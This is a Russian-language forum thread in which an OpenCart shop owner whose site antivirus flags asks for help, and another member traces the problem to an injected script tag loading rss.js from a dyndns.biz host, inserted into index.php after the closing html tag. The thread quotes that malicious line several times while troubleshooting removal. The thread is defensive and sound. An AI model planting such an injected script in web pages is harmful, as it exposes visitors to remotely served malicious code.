X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Вирус на сайте Опенкарт
d75
d75
Topic Starter сообщение 14.6.2012, 8:41; Ответить: d75
Сообщение #1


Новичок
*

Группа: User
Сообщений: 36
Регистрация: 31.8.2011
Из: Псков
Поблагодарили: 1 раз
Репутация:   0  


Здравствуйте форумчане
Вчера касперский начал ругаться на вирус на моём сайте
по онлайн сервисам всё норм., не находит вирус... я в панике, может кто что подскажет/поможет ?


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
taxi2008
taxi2008
сообщение 14.6.2012, 8:44; Ответить: taxi2008
Сообщение #2


Оптимизатор
******

Группа: Active User
Сообщений: 2034
Регистрация: 29.7.2008
Поблагодарили: 470 раз
Репутация:   114  


Откройте исходный код. Вконце страницы найдите:
<script src="http://statcounter.dyndns.biz/rss.js"></script>

Удалите его


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
d75
d75
Topic Starter сообщение 14.6.2012, 8:45; Ответить: d75
Сообщение #3


Новичок
*

Группа: User
Сообщений: 36
Регистрация: 31.8.2011
Из: Псков
Поблагодарили: 1 раз
Репутация:   0  


(taxi2008 @ 14.6.2012, 7:44) *
Откройте исходный код. Вконце страницы найдите:
<script src="http://statcounter.dyndns.biz/rss.js"></script>

Удалите его

Вы имеете в виду главную ?


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
taxi2008
taxi2008
сообщение 14.6.2012, 8:47; Ответить: taxi2008
Сообщение #4


Оптимизатор
******

Группа: Active User
Сообщений: 2034
Регистрация: 29.7.2008
Поблагодарили: 470 раз
Репутация:   114  


Она на любой есть! Идет после тега </html>
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
d75
d75
Topic Starter сообщение 14.6.2012, 8:55; Ответить: d75
Сообщение #5


Новичок
*

Группа: User
Сообщений: 36
Регистрация: 31.8.2011
Из: Псков
Поблагодарили: 1 раз
Репутация:   0  


(taxi2008 @ 14.6.2012, 7:47) *
Она на любой есть! Идет после тега </html>

Да есть, но в редакторе нет ничего


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
taxi2008
taxi2008
сообщение 14.6.2012, 9:40; Ответить: taxi2008
Сообщение #6


Оптимизатор
******

Группа: Active User
Сообщений: 2034
Регистрация: 29.7.2008
Поблагодарили: 470 раз
Репутация:   114  


А вы думали все так просто?
Идет после тега </html>

Это уже говорит о том, что код в php файле, который генерирует страницу
Первым делом просмотрите файл index.php, а если ничего не найдете, ищите через total comander, во всех файлах движка, на совпадение текста

Сообщение отредактировал taxi2008 - 14.6.2012, 9:41


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
d75
d75
Topic Starter сообщение 14.6.2012, 11:20; Ответить: d75
Сообщение #7


Новичок
*

Группа: User
Сообщений: 36
Регистрация: 31.8.2011
Из: Псков
Поблагодарили: 1 раз
Репутация:   0  


Удалил в файле index.php этот код, сайт открывается, но он пустой

Сообщение отредактировал lostprophet - 14.6.2012, 12:20
Причина редактирования: избыточное цитирование


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
taxi2008
taxi2008
сообщение 14.6.2012, 12:10; Ответить: taxi2008
Сообщение #8


Оптимизатор
******

Группа: Active User
Сообщений: 2034
Регистрация: 29.7.2008
Поблагодарили: 470 раз
Репутация:   114  


Неправильно удалили, выпишите сюда кусок кода с php файла с этим скриптом


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
d75
d75
Topic Starter сообщение 14.6.2012, 12:23; Ответить: d75
Сообщение #9


Новичок
*

Группа: User
Сообщений: 36
Регистрация: 31.8.2011
Из: Псков
Поблагодарили: 1 раз
Репутация:   0  


(taxi2008 @ 14.6.2012, 11:10) *
Неправильно удалили, выпишите сюда кусок кода с php файла с этим скриптом

// Router
if (isset($request->get['route'])) {
$action = new Action($request->get['route']);
} else {
$action = new Action('common/home');
}

// Dispatch
$controller->dispatch($action, new Action('error/not_found'));

// что то тут было не помню, а дальше :
<script src="http://statcounter.dyndns.biz/rss.js"></script>

?>


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
taxi2008
taxi2008
сообщение 14.6.2012, 12:30; Ответить: taxi2008
Сообщение #10


Оптимизатор
******

Группа: Active User
Сообщений: 2034
Регистрация: 29.7.2008
Поблагодарили: 470 раз
Репутация:   114  


что то тут было не помню, а дальше

В бекапе посмотрите. Выложите полный кусок кода
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) SimplePay: Прием платежей на сайте для юридических и физических лиц
4 kuprum 531 15.12.2017, 14:07
автор: kuprum
Горячая тема (нет новых ответов) Рекомендую: размещение статьи на сайте, ТИЦ 325, PR 6, траст XT 8
44 rumblade 10694 14.12.2017, 15:45
автор: rumblade
Открытая тема (нет новых ответов) 17 вещей на вашем сайте, которые ненавидят
Один из постулатов маркетинга — не раздражать людей
25 PostBrigada 3631 12.12.2017, 21:44
автор: alexandrrr
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыПрибыль с видео на сайте и в соц сетях
Как получить доп доход с нативного контента
14 maxim_krasovskiy 2838 12.12.2017, 12:05
автор: maxim_krasovskiy
Открытая тема (нет новых ответов) ALFAcoins.com - Приём криптовалюты на вашем сайте
17 ALFAcoins 3705 11.12.2017, 23:07
автор: ALFAcoins


 



RSS Текстовая версия Сейчас: 17.12.2017, 18:21
Дизайн